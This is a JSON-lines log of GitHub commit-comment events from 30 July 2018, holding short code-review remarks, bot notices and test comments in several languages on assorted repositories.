{"id":"8037506368","type":"CommitCommentEvent","actor":{"login":"smanish1"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29886351,"position":null,"line":null,"path":null,"commit_id":"888db5d138ae543b9b64838788bf1af177c4fed1","created_at":"2018-07-30T12:52:49Z","updated_at":"2018-07-30T12:52:49Z","author_association":"CONTRIBUTOR","body":"test comment 123"}},"created_at":"2018-07-30T12:52:49Z"}
{"id":"8037508350","type":"CommitCommentEvent","actor":{"login":"uhussain"},"repo":{"name":"uhussain/UWVV"},"payload":{"comment":{"id":29886356,"position":null,"line":null,"path":null,"commit_id":"030cdef7f62946ee51d5e803aaafa373ebc4b643","created_at":"2018-07-30T12:53:12Z","updated_at":"2018-07-30T12:53:12Z","author_association":"OWNER","body":"https://twiki.cern.ch/twiki/bin/viewauth/CMS/HiggsZZ4l2018#Electrons"}},"created_at":"2018-07-30T12:53:12Z"}
{"id":"8037509038","type":"CommitCommentEvent","actor":{"login":"vadz"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29886359,"position":null,"line":null,"path":null,"commit_id":"342e4454238b32617fcd1fa49a1117d80a19237a","created_at":"2018-07-30T12:53:19Z","updated_at":"2018-07-30T12:53:19Z","author_association":"CONTRIBUTOR","body":"I've done this in 61c3160340cce1d7158d671110b08204b35ee060\r\n\r\n(this involved editing `build/files`, running `./build/upmake` and then `bakefile_gen -b wx.bkl`)."}},"created_at":"2018-07-30T12:53:19Z"}
{"id":"8037509121","type":"CommitCommentEvent","actor":{"login":"mazzomaz"},"repo":{"name":"openmediavault/openmediavault"},"payload":{"comment":{"id":29886360,"position":null,"line":null,"path":null,"commit_id":"1b0df8eea4a4656d3f27749566afe2ae690033a2","created_at":"2018-07-30T12:53:20Z","updated_at":"2018-07-30T12:53:20Z","author_association":"NONE","body":"Hmmm ... The \"obsolete way\" ist the only one working for me. I just wrote a blog-post about this: https://call-a-tux.de/openmediavault-ip-alias/ (it's in German - hopefully it's okay? )\r\n\r\nUsing OMV Version 4.1.9"}},"created_at":"2018-07-30T12:53:20Z"}
{"id":"8037509457","type":"CommitCommentEvent","actor":{"login":"indianprogrammer"},"repo":{"name":"indianprogrammer/navyug_school"},"payload":{"comment":{"id":29886363,"position":3,"line":61,"path":"application/modules/classes/controllers/Classes.php","commit_id":"27856f74d22dcfea2033d6f10bcb2d8eda81ea7e","created_at":"2018-07-30T12:53:24Z","updated_at":"2018-07-30T12:53:24Z","author_association":"OWNER","body":"?????"}},"created_at":"2018-07-30T12:53:24Z"}
{"id":"8037509878","type":"CommitCommentEvent","actor":{"login":"pgarin"},"repo":{"name":"luis-rojas213/ruby-exercises"},"payload":{"comment":{"id":29886368,"position":27,"line":20,"path":"test_spec.rb","commit_id":"5d8590bd073640874622a077f25c9154a2886ff1","created_at":"2018-07-30T12:53:28Z","updated_at":"2018-07-30T12:53:28Z","author_association":"NONE","body":"Para el caso de la igualdad, siempre usamos las paralbras clave de RSpec, no el \"==\", sino el \"be\". Queda mucho claro el caso de prueba.\r\nRevisar: https://relishapp.com/rspec/rspec-expectations/v/2-2/docs/matchers/be-matchers\r\n"}},"created_at":"2018-07-30T12:53:28Z"}
{"id":"8037511754","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29886372,"position":29,"line":29,"path":"Lesson3/train.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:53:50Z","updated_at":"2018-07-30T12:53:50Z","author_association":"NONE","body":"И да, это точно не строка. `@route.stations.first` долженн возвращать именно объект станции, что-б у него можно было вызывать методы определенные в классе станция"}},"created_at":"2018-07-30T12:53:50Z"}
{"id":"8037518585","type":"CommitCommentEvent","actor":{"login":"pgarin"},"repo":{"name":"luis-rojas213/ruby-exercises"},"payload":{"comment":{"id":29886393,"position":73,"line":65,"path":"test_spec.rb","commit_id":"5d8590bd073640874622a077f25c9154a2886ff1","created_at":"2018-07-30T12:55:07Z","updated_at":"2018-07-30T12:55:07Z","author_association":"NONE","body":"No entiendo bien qué es lo que se quiere probar aquí. Si el método no tiene restricción alguna respecto al largo del String que se le pasa, no realizar esta prueba."}},"created_at":"2018-07-30T12:55:07Z"}
{"id":"8037519824","type":"CommitCommentEvent","actor":{"login":"uhussain"},"repo":{"name":"uhussain/UWVV"},"payload":{"comment":{"id":29886395,"position":null,"line":null,"path":null,"commit_id":"8c9f368b8330786325134e719c03f6bb986dae16","created_at":"2018-07-30T12:55:20Z","updated_at":"2018-07-30T12:55:20Z","author_association":"OWNER","body":"It turns out that both functions give a similar if not the exact same outcome (at least in this case)"}},"created_at":"2018-07-30T12:55:20Z"}
{"id":"8037522830","type":"CommitCommentEvent","actor":{"login":"pavanjadhaw"},"repo":{"name":"NerdyPepper/dotfiles"},"payload":{"comment":{"id":29886407,"position":null,"line":null,"path":null,"commit_id":"f257207a6b0ce1a8b5878646b62ae245088ed927","created_at":"2018-07-30T12:55:53Z","updated_at":"2018-07-30T12:55:53Z","author_association":"NONE","body":":laughing: "}},"created_at":"2018-07-30T12:55:53Z"}
{"id":"8037523785","type":"CommitCommentEvent","actor":{"login":"kbaraniecki90"},"repo":{"name":"kbaraniecki90/Szkolenie"},"payload":{"comment":{"id":29886411,"position":null,"line":null,"path":null,"commit_id":"b9be3fa2124ae3cf43bd7447733fe20fdf89369f","created_at":"2018-07-30T12:56:04Z","updated_at":"2018-07-30T12:56:04Z","author_association":"OWNER","body":"Nie zaliczam."}},"created_at":"2018-07-30T12:56:04Z"}
{"id":"8037526136","type":"CommitCommentEvent","actor":{"login":"vivizco"},"repo":{"name":"kbaraniecki90/Szkolenie"},"payload":{"comment":{"id":29886414,"position":null,"line":null,"path":null,"commit_id":"b9be3fa2124ae3cf43bd7447733fe20fdf89369f","created_at":"2018-07-30T12:56:32Z","updated_at":"2018-07-30T12:56:32Z","author_association":"COLLABORATOR","body":"Pan da 3."}},"created_at":"2018-07-30T12:56:32Z"}
{"id":"8037527524","type":"CommitCommentEvent","actor":{"login":"DGafetdinov"},"repo":{"name":"Elirena/baths"},"payload":{"comment":{"id":29886417,"position":null,"line":null,"path":null,"commit_id":"b0108a4714c5a51ec5c885569a03f7ccf12d95cc","created_at":"2018-07-30T12:56:47Z","updated_at":"2018-07-30T12:56:47Z","author_association":"NONE","body":"@Elirena *thumbs_up*"}},"created_at":"2018-07-30T12:56:47Z"}
{"id":"8037528219","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29886418,"position":47,"line":47,"path":"Lesson3/train.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:56:55Z","updated_at":"2018-07-30T12:56:55Z","author_association":"NONE","body":"Тут должна быть проверка, если есть следующая станция\r\n```\r\nif next_station\r\n  - говорим текущей станции, что поезд уехал\r\n  - говорим следующей станции, что поезд приехал\r\n  - инкрементим индекс текущей станции\r\n```"}},"created_at":"2018-07-30T12:56:55Z"}
{"id":"8037530737","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"KhoaGamingVN/RestartMe-PM"},"payload":{"comment":{"id":29886420,"position":null,"line":null,"path":null,"commit_id":"ecadc68ebecf33f1e84dadab6ac1661121e791ec","created_at":"2018-07-30T12:57:24Z","updated_at":"2018-07-30T12:57:24Z","author_association":"NONE","body":"> Dear @KhoaGamingVN:\n> I regret to inform you that the release you submitted, named \"**RestartMe**\" (v1.4.1), for the project [RestartMe-PM](https://poggit.pmmp.io/ci/KhoaGamingVN/RestartMe-PM/RestartMe-PM) on 2018-07-30T12:53:55.000Z, has been rejected.\n\n3.1.0, 3.1.1, etc. are automatically included when you write `3.0.0` in plugin.yml. This will raise warnings in future versions of PocketMine. Please remove them.\n\n> Please resolve the issues listed above and submit the updated plugin again.\n> Note: This comment is created here because this is the last commit when the released build was created."}},"created_at":"2018-07-30T12:57:24Z"}
{"id":"8037531700","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29886422,"position":52,"line":52,"path":"Lesson3/train.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:57:34Z","updated_at":"2018-07-30T12:57:34Z","author_association":"NONE","body":"см go_forward"}},"created_at":"2018-07-30T12:57:34Z"}
{"id":"8037532949","type":"CommitCommentEvent","actor":{"login":"uhussain"},"repo":{"name":"uhussain/UWVV"},"payload":{"comment":{"id":29886424,"position":null,"line":null,"path":null,"commit_id":"dfc233e5169bb6f7bd8e13f1cb471a666d3e7339","created_at":"2018-07-30T12:57:48Z","updated_at":"2018-07-30T12:57:48Z","author_association":"OWNER","body":"Ok so this was added when i checked whether 'NoOfMatches' gives the same result as 'MatchedStations' in the context of 2017 MuonID \r\nhttps://twiki.cern.ch/twiki/bin/viewauth/CMS/HiggsZZ4l2018#Muons"}},"created_at":"2018-07-30T12:57:48Z"}
{"id":"8037537689","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29886436,"position":32,"line":32,"path":"Lesson3/train.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:58:40Z","updated_at":"2018-07-30T12:58:40Z","author_association":"NONE","body":"В этих трех методах, нужно использовать объекты и current_station_index"}},"created_at":"2018-07-30T12:58:40Z"}
{"id":"8037544725","type":"CommitCommentEvent","actor":{"login":"smanish1"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29886456,"position":null,"line":null,"path":null,"commit_id":"888db5d138ae543b9b64838788bf1af177c4fed1","created_at":"2018-07-30T12:59:59Z","updated_at":"2018-07-30T12:59:59Z","author_association":"CONTRIBUTOR","body":"test comment 123"}},"created_at":"2018-07-30T12:59:59Z"}
{"id":"8037547548","type":"CommitCommentEvent","actor":{"login":"yannski"},"repo":{"name":"Scalingo/documentation"},"payload":{"comment":{"id":29886469,"position":11,"line":11,"path":"_posts/languages/php/2000-01-01-codeigniter.md","commit_id":"0aebf43b721bc75ac53e662f64512597864661ad","created_at":"2018-07-30T13:00:27Z","updated_at":"2018-07-30T13:00:27Z","author_association":"CONTRIBUTOR","body":"s/if it is using a CodeIgniter 3/if it is using CodeIgniter/"}},"created_at":"2018-07-30T13:00:27Z"}
{"id":"8037551858","type":"CommitCommentEvent","actor":{"login":"tronnort"},"repo":{"name":"ServiceStack/redis-windows"},"payload":{"comment":{"id":29886476,"position":null,"line":null,"path":null,"commit_id":"b6eeaf0a45467fff5b78aaf188760608f2e1fee5","created_at":"2018-07-30T13:01:13Z","updated_at":"2018-07-30T13:01:13Z","author_association":"NONE","body":"why！！！"}},"created_at":"2018-07-30T13:01:13Z"}
{"id":"8037552473","type":"CommitCommentEvent","actor":{"login":"yannski"},"repo":{"name":"Scalingo/documentation"},"payload":{"comment":{"id":29886478,"position":60,"line":60,"path":"_posts/languages/php/2000-01-01-codeigniter.md","commit_id":"0aebf43b721bc75ac53e662f64512597864661ad","created_at":"2018-07-30T13:01:19Z","updated_at":"2018-07-30T13:01:19Z","author_association":"CONTRIBUTOR","body":"I don't understand this sentence. What do you want to say?"}},"created_at":"2018-07-30T13:01:19Z"}
{"id":"8037553550","type":"CommitCommentEvent","actor":{"login":"creatorvivek"},"repo":{"name":"indianprogrammer/navyug_school"},"payload":{"comment":{"id":29886482,"position":3,"line":61,"path":"application/modules/classes/controllers/Classes.php","commit_id":"27856f74d22dcfea2033d6f10bcb2d8eda81ea7e","created_at":"2018-07-30T13:01:31Z","updated_at":"2018-07-30T13:01:31Z","author_association":"COLLABORATOR","body":"before full path show in database now only image name.extension only "}},"created_at":"2018-07-30T13:01:31Z"}
{"id":"8037554211","type":"CommitCommentEvent","actor":{"login":"JoepVanlier"},"repo":{"name":"Data2Dynamics/d2d"},"payload":{"comment":{"id":29886483,"position":null,"line":null,"path":null,"commit_id":"5b605cebbdebfc435208ef503d02f19e1cd93909","created_at":"2018-07-30T13:01:37Z","updated_at":"2018-07-30T13:01:37Z","author_association":"MEMBER","body":"thanks!"}},"created_at":"2018-07-30T13:01:37Z"}
{"id":"8037554323","type":"CommitCommentEvent","actor":{"login":"jeanlauliac"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29886485,"position":32,"line":27,"path":"local-cli/bundle/unbundle.js","commit_id":"ebf5aeab280f2ebc439ec39d25c48fdf1980cf73","created_at":"2018-07-30T13:01:39Z","updated_at":"2018-07-30T13:01:39Z","author_association":"CONTRIBUTOR","body":"It's just for the description generated by yargs, afaik? I want to make sure folks can see which is the new option name in addition to the command rename, whichever this shows up."}},"created_at":"2018-07-30T13:01:39Z"}
{"id":"8037554607","type":"CommitCommentEvent","actor":{"login":"methane"},"repo":{"name":"jdemeyer/cpython"},"payload":{"comment":{"id":29886487,"position":22,"line":350,"path":"Include/object.h","commit_id":"ea8e94921f528544865e49352413eb2101e7640c","created_at":"2018-07-30T13:01:42Z","updated_at":"2018-07-30T13:01:42Z","author_association":"NONE","body":"`sizeof(int (*printfunc)(PyObject *, FILE *, int))` can be different from `sizeof(Py_ssize_t)`.\r\n\r\nI think `intptr_t` is safe.  While size of function pointer can be differ from `sizeof(void*)` in\r\nC specification, I think it is same for all platforms Python supports."}},"created_at":"2018-07-30T13:01:42Z"}
{"id":"8037554916","type":"CommitCommentEvent","actor":{"login":"y2sinx"},"repo":{"name":"y2sinx/test"},"payload":{"comment":{"id":29886488,"position":1,"line":1,"path":"README.md","commit_id":"15c9cd2ca518ad563dae8c28283255557a1e421d","created_at":"2018-07-30T13:01:45Z","updated_at":"2018-07-30T13:01:45Z","author_association":"OWNER","body":"这是在干啥啊, 是注释还是修改文件啊"}},"created_at":"2018-07-30T13:01:45Z"}
{"id":"8037561742","type":"CommitCommentEvent","actor":{"login":"y2sinx"},"repo":{"name":"y2sinx/test"},"payload":{"comment":{"id":29886497,"position":null,"line":null,"path":null,"commit_id":"15c9cd2ca518ad563dae8c28283255557a1e421d","created_at":"2018-07-30T13:03:01Z","updated_at":"2018-07-30T13:03:01Z","author_association":"OWNER","body":"上面的是备注吗, 这是在修改文件吧"}},"created_at":"2018-07-30T13:03:01Z"}
{"id":"8037562683","type":"CommitCommentEvent","actor":{"login":"JaCoelho84"},"repo":{"name":"JaCoelho84/helllo-word"},"payload":{"comment":{"id":29886498,"position":null,"line":null,"path":null,"commit_id":"50d30caf0ae0bfaeaa94281729c30b9c51878fd8","created_at":"2018-07-30T13:03:12Z","updated_at":"2018-07-30T13:03:12Z","author_association":"OWNER","body":"This is a commit of some changes."}},"created_at":"2018-07-30T13:03:12Z"}
{"id":"8037565188","type":"CommitCommentEvent","actor":{"login":"Bert-R"},"repo":{"name":"yonadev/yona-app-ios"},"payload":{"comment":{"id":29886504,"position":4,"line":7,"path":".gitignore","commit_id":"5377e27ddf1f176075265b5660fa9ef874371154","created_at":"2018-07-30T13:03:39Z","updated_at":"2018-07-30T13:03:39Z","author_association":"CONTRIBUTOR","body":"This file should stay in ``.gitignore`` and the other one should be removed."}},"created_at":"2018-07-30T13:03:39Z"}
{"id":"8037567382","type":"CommitCommentEvent","actor":{"login":"jeanlauliac"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29886507,"position":32,"line":27,"path":"local-cli/bundle/unbundle.js","commit_id":"ebf5aeab280f2ebc439ec39d25c48fdf1980cf73","created_at":"2018-07-30T13:04:04Z","updated_at":"2018-07-30T13:04:04Z","author_association":"CONTRIBUTOR","body":"I sent a change to rename in the docs as well, let me know what you think (https://github.com/facebook/react-native-website/pull/477)."}},"created_at":"2018-07-30T13:04:04Z"}
{"id":"8037569606","type":"CommitCommentEvent","actor":{"login":"Bert-R"},"repo":{"name":"yonadev/yona-app-ios"},"payload":{"comment":{"id":29886510,"position":1,"line":1,"path":"Yona/fabric.apikey","commit_id":"5377e27ddf1f176075265b5660fa9ef874371154","created_at":"2018-07-30T13:04:29Z","updated_at":"2018-07-30T13:04:29Z","author_association":"CONTRIBUTOR","body":"This file should be removed. Instead, create an empty file in your workspace. You can't have it under version control, as the build would be updating and committing it otherwise."}},"created_at":"2018-07-30T13:04:29Z"}
{"id":"8037574531","type":"CommitCommentEvent","actor":{"login":"EtienneM"},"repo":{"name":"Scalingo/documentation"},"payload":{"comment":{"id":29886522,"position":60,"line":60,"path":"_posts/languages/php/2000-01-01-codeigniter.md","commit_id":"0aebf43b721bc75ac53e662f64512597864661ad","created_at":"2018-07-30T13:05:25Z","updated_at":"2018-07-30T13:05:25Z","author_association":"MEMBER","body":"That's a copy-paste from Symfony documentation page ^^\r\nWe say that for all technologies, we get the logs from stdout and send them to our logs aggregation system but it does not work with PHP apps. PHP apps write their log to a file, hence we need to get this file content and forward its content to our aggregation system"}},"created_at":"2018-07-30T13:05:25Z"}
{"id":"8037575034","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"shiyaroo/blog1"},"payload":{"comment":{"id":29886525,"position":10,"line":10,"path":"delete.php","commit_id":"40fb59211bba3d074611a828588d5dced7edb5e6","created_at":"2018-07-30T13:05:31Z","updated_at":"2018-07-30T13:05:31Z","author_association":"NONE","body":"Запити до бази даних треба екранувати"}},"created_at":"2018-07-30T13:05:31Z"}
{"id":"8037577274","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/threedigrid-feedstock"},"payload":{"comment":{"id":29886532,"position":null,"line":null,"path":null,"commit_id":"e73e22babe3e6ec46a0d80f5a18cacf68c400671","created_at":"2018-07-30T13:05:56Z","updated_at":"2018-07-30T13:05:56Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @larsclaussen, @jpprins1, @byrman were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @caspervdw was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-30T13:05:56Z"}
{"id":"8037579171","type":"CommitCommentEvent","actor":{"login":"rui314"},"repo":{"name":"ShinyaKato/seccamp2018"},"payload":{"comment":{"id":29886535,"position":56,"line":11,"path":"parse.c","commit_id":"fb78bec587c130d85ab5aebe395a52fc0b827b35","created_at":"2018-07-30T13:06:18Z","updated_at":"2018-07-30T13:06:18Z","author_association":"NONE","body":"これはcallocでゼロクリアされたメモリを割り当てて、NULL初期化は省略したほうがいいかもですね。厳密にはゼロ初期化でNULLになるとは限らないんですが（ポインタの内部表現として全ビット0がNULLとポータブルに決まっているわけではない）、普通はそうなので実際は問題ではので。"}},"created_at":"2018-07-30T13:06:18Z"}
{"id":"8037579745","type":"CommitCommentEvent","actor":{"login":"smanish01"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29886538,"position":null,"line":null,"path":null,"commit_id":"fc3169072eac543142c7413cbc1dfc0b2bc7ada9","created_at":"2018-07-30T13:06:25Z","updated_at":"2018-07-30T13:06:25Z","author_association":"OWNER","body":"test pull request commit"}},"created_at":"2018-07-30T13:06:25Z"}
{"id":"8037582647","type":"CommitCommentEvent","actor":{"login":"thedustinsmith"},"repo":{"name":"Foliotek/Croppie"},"payload":{"comment":{"id":29886543,"position":null,"line":null,"path":null,"commit_id":"e15877101624da79032a6717d16b9529f948fc05","created_at":"2018-07-30T13:06:58Z","updated_at":"2018-07-30T13:06:58Z","author_association":"MEMBER","body":"Good call.  I'm open to PR's."}},"created_at":"2018-07-30T13:06:58Z"}
{"id":"8037587154","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"shiyaroo/blog1"},"payload":{"comment":{"id":29886555,"position":1,"line":1,"path":"contact.php","commit_id":"40fb59211bba3d074611a828588d5dced7edb5e6","created_at":"2018-07-30T13:07:48Z","updated_at":"2018-07-30T13:07:48Z","author_association":"NONE","body":"Форматування коду\r\nНемає ООП\r\nТреба заливати з копією бази даних\r\nСтилі мають бути в окремій папці\r\nКартинки також заливати на гіт\r\nХедер треба винести в окремий файл"}},"created_at":"2018-07-30T13:07:48Z"}
{"id":"8037587158","type":"CommitCommentEvent","actor":{"login":"ashtru"},"repo":{"name":"AuthorizeNet/sdk-dotnet"},"payload":{"comment":{"id":29886556,"position":21,"line":22,"path":"Authorize.NET/CIM/Address.cs","commit_id":"49ca00d56a782996c37bc3c99a5afbca37f22072","created_at":"2018-07-30T13:07:48Z","updated_at":"2018-07-30T13:07:48Z","author_association":"CONTRIBUTOR","body":"Exclude styling changes for code that is not added new."}},"created_at":"2018-07-30T13:07:48Z"}
{"id":"8037587475","type":"CommitCommentEvent","actor":{"login":"ashtru"},"repo":{"name":"AuthorizeNet/sdk-dotnet"},"payload":{"comment":{"id":29886560,"position":31,"line":37,"path":"Authorize.NET/CIM/Address.cs","commit_id":"49ca00d56a782996c37bc3c99a5afbca37f22072","created_at":"2018-07-30T13:07:52Z","updated_at":"2018-07-30T13:07:52Z","author_association":"CONTRIBUTOR","body":"Exclude styling changes for code that is not added new."}},"created_at":"2018-07-30T13:07:52Z"}
{"id":"8037588529","type":"CommitCommentEvent","actor":{"login":"ashtru"},"repo":{"name":"AuthorizeNet/sdk-dotnet"},"payload":{"comment":{"id":29886562,"position":31,"line":33,"path":"Authorize.NET/CP/CardPresentAuthorization.cs","commit_id":"49ca00d56a782996c37bc3c99a5afbca37f22072","created_at":"2018-07-30T13:08:04Z","updated_at":"2018-07-30T13:08:04Z","author_association":"CONTRIBUTOR","body":"Exclude styling changes for code that is not added new."}},"created_at":"2018-07-30T13:08:04Z"}
{"id":"8037590430","type":"CommitCommentEvent","actor":{"login":"TheAz928"},"repo":{"name":"CubePM/MysteryBox"},"payload":{"comment":{"id":29886564,"position":null,"line":null,"path":null,"commit_id":"109bb0ddf6a0d8ffa07578a8260d6282b570c087","created_at":"2018-07-30T13:08:26Z","updated_at":"2018-07-30T13:08:26Z","author_association":"COLLABORATOR","body":"@SOF3 Issues have been resolved."}},"created_at":"2018-07-30T13:08:26Z"}
{"id":"8037591027","type":"CommitCommentEvent","actor":{"login":"ashtru"},"repo":{"name":"AuthorizeNet/sdk-dotnet"},"payload":{"comment":{"id":29886565,"position":29,"line":29,"path":"Authorize.NET/Reporting/Batch.cs","commit_id":"49ca00d56a782996c37bc3c99a5afbca37f22072","created_at":"2018-07-30T13:08:32Z","updated_at":"2018-07-30T13:08:32Z","author_association":"CONTRIBUTOR","body":"Exclude styling changes for code that is not added new."}},"created_at":"2018-07-30T13:08:32Z"}
{"id":"8037592594","type":"CommitCommentEvent","actor":{"login":"ashtru"},"repo":{"name":"AuthorizeNet/sdk-dotnet"},"payload":{"comment":{"id":29886567,"position":2,"line":1,"path":"Authorize.NET/SIM/SIMFormGenerator.cs","commit_id":"49ca00d56a782996c37bc3c99a5afbca37f22072","created_at":"2018-07-30T13:08:50Z","updated_at":"2018-07-30T13:08:50Z","author_association":"CONTRIBUTOR","body":"Exclude styling changes for code that is not added new."}},"created_at":"2018-07-30T13:08:50Z"}
{"id":"8037593186","type":"CommitCommentEvent","actor":{"login":"ashtru"},"repo":{"name":"AuthorizeNet/sdk-dotnet"},"payload":{"comment":{"id":29886569,"position":16,"line":19,"path":"Authorize.NET/Util/EnumHelper.cs","commit_id":"49ca00d56a782996c37bc3c99a5afbca37f22072","created_at":"2018-07-30T13:08:57Z","updated_at":"2018-07-30T13:08:57Z","author_association":"CONTRIBUTOR","body":"Exclude styling changes for code that is not added new."}},"created_at":"2018-07-30T13:08:57Z"}
{"id":"8037599558","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"shiyaroo/blog1"},"payload":{"comment":{"id":29886584,"position":12,"line":12,"path":"contact.php","commit_id":"40fb59211bba3d074611a828588d5dced7edb5e6","created_at":"2018-07-30T13:10:08Z","updated_at":"2018-07-30T13:10:08Z","author_association":"NONE","body":"Це треба повиносити в css файл"}},"created_at":"2018-07-30T13:10:08Z"}
{"id":"8037599596","type":"CommitCommentEvent","actor":{"login":"elwazana"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29886585,"position":null,"line":null,"path":null,"commit_id":"03fdd1b0d597613250c017996c8acfbacd22aa3c","created_at":"2018-07-30T13:10:08Z","updated_at":"2018-07-30T13:10:08Z","author_association":"COLLABORATOR","body":"@smiths The changes you made have corrected my errors and seems to still work for windows machines. "}},"created_at":"2018-07-30T13:10:08Z"}
{"id":"8037604305","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29886600,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-30T13:10:59Z","updated_at":"2018-07-30T13:10:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T13:10:59Z"}
{"id":"8037604352","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"shiyaroo/blog1"},"payload":{"comment":{"id":29886602,"position":23,"line":23,"path":"contact.php","commit_id":"40fb59211bba3d074611a828588d5dced7edb5e6","created_at":"2018-07-30T13:10:59Z","updated_at":"2018-07-30T13:10:59Z","author_association":"NONE","body":"Якщо це мало бути закоментовано, то так треба коментувати кожний рядок"}},"created_at":"2018-07-30T13:10:59Z"}
{"id":"8037606770","type":"CommitCommentEvent","actor":{"login":"notVitaliy"},"repo":{"name":"magic8bot/magic8bot"},"payload":{"comment":{"id":29886611,"position":1,"line":1,"path":"src/strategy/indicators/macd.ts","commit_id":"1f3c5f938387abc62bed21ff327096eb976e7570","created_at":"2018-07-30T13:11:27Z","updated_at":"2018-07-30T13:11:27Z","author_association":"MEMBER","body":"Extra space here."}},"created_at":"2018-07-30T13:11:27Z"}
{"id":"8037611429","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"shiyaroo/blog1"},"payload":{"comment":{"id":29886625,"position":65,"line":65,"path":"contact.php","commit_id":"40fb59211bba3d074611a828588d5dced7edb5e6","created_at":"2018-07-30T13:12:18Z","updated_at":"2018-07-30T13:12:18Z","author_association":"NONE","body":"Тут напевне якись колір має бути замість рисок"}},"created_at":"2018-07-30T13:12:18Z"}
{"id":"8037612228","type":"CommitCommentEvent","actor":{"login":"brandonkelly"},"repo":{"name":"craftcms/element-api"},"payload":{"comment":{"id":29886629,"position":null,"line":null,"path":null,"commit_id":"8b4960890fb8d0fc9e7d0e53b583dca38461a387","created_at":"2018-07-30T13:12:26Z","updated_at":"2018-07-30T13:12:26Z","author_association":"MEMBER","body":"Doh, thanks @carlcs!"}},"created_at":"2018-07-30T13:12:26Z"}
{"id":"8037614833","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"shiyaroo/blog1"},"payload":{"comment":{"id":29886634,"position":122,"line":122,"path":"contact.php","commit_id":"40fb59211bba3d074611a828588d5dced7edb5e6","created_at":"2018-07-30T13:12:56Z","updated_at":"2018-07-30T13:12:56Z","author_association":"NONE","body":"футтер має бути в окремому файлі"}},"created_at":"2018-07-30T13:12:56Z"}
{"id":"8037617049","type":"CommitCommentEvent","actor":{"login":"ulf1"},"repo":{"name":"ulf1/oxyba"},"payload":{"comment":{"id":29886640,"position":null,"line":null,"path":null,"commit_id":"72830f1c9a1d4fdc38fb21af43ffbb8ec1f29207","created_at":"2018-07-30T13:13:20Z","updated_at":"2018-07-30T13:13:20Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [block_idxmat_loop v0.15.1](https://trello.com/c/T0qW16Ai/78-blockidxmatloop-v0151)"}},"created_at":"2018-07-30T13:13:20Z"}
{"id":"8037617551","type":"CommitCommentEvent","actor":{"login":"azarz"},"repo":{"name":"airware/buzzard"},"payload":{"comment":{"id":29886641,"position":null,"line":null,"path":null,"commit_id":"a773a51a60e1431bbbb0d7c9a800dc5b51f4a85d","created_at":"2018-07-30T13:13:25Z","updated_at":"2018-07-30T13:13:25Z","author_association":"CONTRIBUTOR","body":"i meant  `GDALMemoryVector` obviously"}},"created_at":"2018-07-30T13:13:25Z"}
{"id":"8037619727","type":"CommitCommentEvent","actor":{"login":"smanish1"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29886646,"position":null,"line":null,"path":null,"commit_id":"888db5d138ae543b9b64838788bf1af177c4fed1","created_at":"2018-07-30T13:13:50Z","updated_at":"2018-07-30T13:13:50Z","author_association":"CONTRIBUTOR","body":"test kdsxcnzkljscdzkjsbckjb"}},"created_at":"2018-07-30T13:13:50Z"}
